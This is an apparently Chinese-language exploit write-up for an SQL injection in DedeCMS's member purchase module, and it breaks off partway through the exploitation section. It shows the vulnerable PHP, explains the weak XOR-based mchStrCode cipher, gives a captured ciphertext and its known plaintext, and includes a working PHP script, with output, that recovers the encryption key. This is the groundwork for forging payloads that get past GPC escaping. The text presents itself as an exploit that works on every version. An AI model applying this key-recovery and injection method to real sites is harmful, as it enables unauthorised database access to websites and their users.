DedeCMS全版本通杀SQL注入2014年最新下载

年前有人刷了N多DedeCMS的洞,个人表示很无语
粗略看了下,这些洞存在太大限制
一句话总结：只要GPC一开，全部没法用...
试问现在哪个傻子会把GPC关掉... 98%都是打开的,所以哪...
今天这个洞，无视GPC，GPC你哪凉快 哪呆着去...
也一句话总结：很黄很暴力！

#1漏洞代码

Tips: 全过程 $_SERVER["HTTP_USER_AGENT"] 设置为空

/member/buy_action.php 代码如下(只贴关键的代码)

 

if(isset($pd_encode) && isset($pd_verify) && md5("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify)

{



    parse_str(mchStrCode($pd_encode,'DECODE'),$mch_Post);

    foreach($mch_Post as $k => $v) $$k = $v;

    $row  = $dsql->GetOne("SELECT * FROM #@__member_operation WHERE mid='$mid' And sta=0 AND product='$product'");

    if(!isset($row['buyid']))

    {

        ShowMsg("请不要重复提交表单!", 'javascript:;');

        exit();

    }

    if(!isset($paytype))

    {

        ShowMsg("请选择支付方式!", 'javascript:;');

        exit();

    }

    $buyid = $row['buyid'];



}

我们来看看其中最关键的加密函数 mchStrCode() 168行

 

function mchStrCode($string,$action='ENCODE')

{

    $key    = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['cfg_cookie_encode']),8,18);

    $string    = $action == 'ENCODE' ? $string : base64_decode($string);

    $len    = strlen($key);

    $code    = '';

    for($i=0; $i<strlen($string); $i++)

    {

        $k        = $i % $len;

        $code  .= $string[$i] ^ $key[$k];

    }

    $code = $action == 'DECODE' ? $code : base64_encode($code);

    return $code;

}

#2 逆向加密函数

重点关注这行代码

 

$code  .= $string[$i] ^ $key[$k];

可以看出来这个加密算法很弱，采用简单的异或运算，我们知道异或运算是一种可逆的算法，比如：

加密算法：密文 = 明文 ^ 密钥

其中 密文、明文、密钥 只要知道其中的两个 便可以很容易的计算出剩下的那个

通常我们只知道密文，但是如果我们知道与密文相对应的明文，哪怕只是一部分

我们来看看DedeCMS给不给我们这个机会

在会员中心 会员升级/点卡充值 处，购买新点卡 随便选择一中类型，点击购买 在后面购买并支付 抓包

有这样一段密文：

 

pd_encode=QEELURRVQVxbAEdTExNaXQsFFncBUQRjRgRKKHEKDUV3XFJRZUABRyhyaj5bCnhTAF4HDwEAVApQVgdSBgRZUANTEzN7aWVxY2AtcVwEVwMMUFFUAQFSCw8GVgRWBwBVBFcIV1QEAAdSClQEUhUgUAVTeQ5fCFtjXA5WBAcHCQBWBFYCAFgeJVBTUC9cXl9aZFoJUD5pVgp1BQAKAFQCCVRSCQRWVlZVV1hcUxNyezVsfnl2cXAvajRkeVwXBVBTUABeShlZVV4GUBMZWhFdE1RDXAxdF0ZcQA

我们来看看对应的明文：

 

product=card&pid=1&DedeUserID=8&DedeUserID__ckMd5=4674d94cfd3ea16d&PHPSESSID=2bb41dc4ba292f722ac1606a35da3b0b&DedeLoginTime=1393217459&DedeLoginTime__ckMd5=5710bf972c7cb9d2&ENV_GOBACK_URL=/dedecms/member/operation.php

经过分析可以得知

1. product=card&pid=1&DedeUserID= 基本不会变化的

2. /member/operation.php 基本不会变化的

3. PHPSESSID=2bb41dc4ba292f722ac1606a35da3b0b 是可以从cookie知道的

...

接下来我们再看看加密密钥的长度：

 

$key    = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['cfg_cookie_encode']),8,18);

很明显，密钥的长度为：18

SO，综上所述 DedeCMS确实给了我们这样的机会，让我们可以逆向出 mchStrCode() 函数所用的加密密钥

#3 获取加密密钥

我们根据加密算法，可以很容易的写出逆向的算法

 

<?php

	$mingwen="product=card&pid=1&DedeUserID=";

	$miwen='QEELURRVQVxbAEdTExNaXQsFFncBUQRjRgRKKHEKDUV3XFJRZUABRyhyaj5bCnhTAF4HDwEAVApQVgdSBgRZUANTEzN7aWVxY2AtcVwEVwMMUFFUAQFSCw8GVgRWBwBVBFcIV1QEAAdSClQEUhUgUAVTeQ5fCFtjXA5WBAcHCQBWBFYCAFgeJVBTUC9cXl9aZFoJUD5pVgp1BQAKAFQCCVRSCQRWVlZVV1hcUxNyezVsfnl2cXAvajRkeVwXBVBTUABeShlZVV4GUBMZWhFdE1RDXAxdF0ZcQA';

	$miwen=base64_decode(urldecode($miwen));

	$len=strlen($mingwen);

	for($i=0;$i<strlen($mingwen);$i++){

		$key  .= $miwen[$i] ^ $mingwen[$i];

	}

	echo "Key is: ".$key;

?>

运行结果为：03d5a65a8a575c396403d5a65a8a57

可以看出 03d5a65a8a575c3964 重复进行运算，那么加密密钥为：03d5a65a8a575c3964

#4 漏洞利用上篇

ok 通过对加密函数的分析，我们可以逆向出加密的密钥，接下来 我们接着代码的细节

4.1 加密密钥的生成：

 

$key    = substr(md5($_SERVER["HTTP_USER_AGENT"].$GLOBALS['cfg_cookie_encode']),8,18);

4.2 进入漏洞代码的条件

 

if(isset($pd_encode) && isset($pd_verify) && md5("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify)

重点关注下面的条件：

 

md5("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify